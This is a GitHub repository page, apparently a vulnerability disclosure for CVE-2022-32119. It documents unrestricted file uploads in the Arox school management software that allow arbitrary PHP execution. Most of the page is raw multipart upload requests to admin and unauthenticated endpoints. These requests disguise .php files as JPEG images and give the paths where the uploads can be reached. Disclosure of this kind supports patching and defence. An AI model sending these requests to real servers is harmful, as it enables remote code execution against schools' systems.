Skip to content

JC175/CVE-2022-32119

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

CVE-2022-32119 - Arox-Unrestricted-File-Upload

There are multiple unrestricted file uploads that result in the arbitrary execution of PHP code.

Authenticated Vulnerable Pages:

localhost/office_admin/?pid=54&action=add

-----------------------------181967832439954202373233921976

Content-Disposition: form-data; name="apid"

2

-----------------------------181967832439954202373233921976

Content-Disposition: form-data; name="title"

Test

-----------------------------181967832439954202373233921976

Content-Disposition: form-data; name="image_path"; filename="phpfilehere.php.jpg"

Content-Type: image/jpeg

-----------------------------181967832439954202373233921976

Content-Disposition: form-data; name="addphoto"

Add

-----------------------------181967832439954202373233921976--

File location: localhost/office_admin/images/student_photos/

localhost/office_admin/?pid=22&action=school_details

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_startdate"

06/04/2022

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_enddate"

07/04/2022

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_ac_startdate"

06/04/2022

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_ac_enddate"

07/04/2022

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_schoolname"

Test

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_currency"

Test

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_symbol"

test

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_address"

Test

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_endclass"

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_email"

info@test.com

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_phoneno"

1234567899

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_website"

www.test.com

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_school_logo"; filename="phpfilehere.php"

Content-Type: image/jpeg

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="oldlogoimage"

oldimage.jpg

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="Submit"

Submit

-----------------------------11158482814295139764067111151--

File location: localhost/office_admin/images/school_logo/

Unauthenticated Vulnerable Pages:

localhost/greatbritain/greatbritain/upload_stafffille.php

-----------------------------80149291128776956634294289925

Content-Disposition: form-data; name="txtdocname"; filename="test.jpg"

Content-Type: image/jpeg

123456

-----------------------------80149291128776956634294289925

Content-Disposition: form-data; name="btnsubmit"

Submit

-----------------------------80149291128776956634294289925--

File location: localhost/greatbritain/greatbritain/upload_data/

About

CVE-2022-32119 - Arox-Unrestricted-File-Upload

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published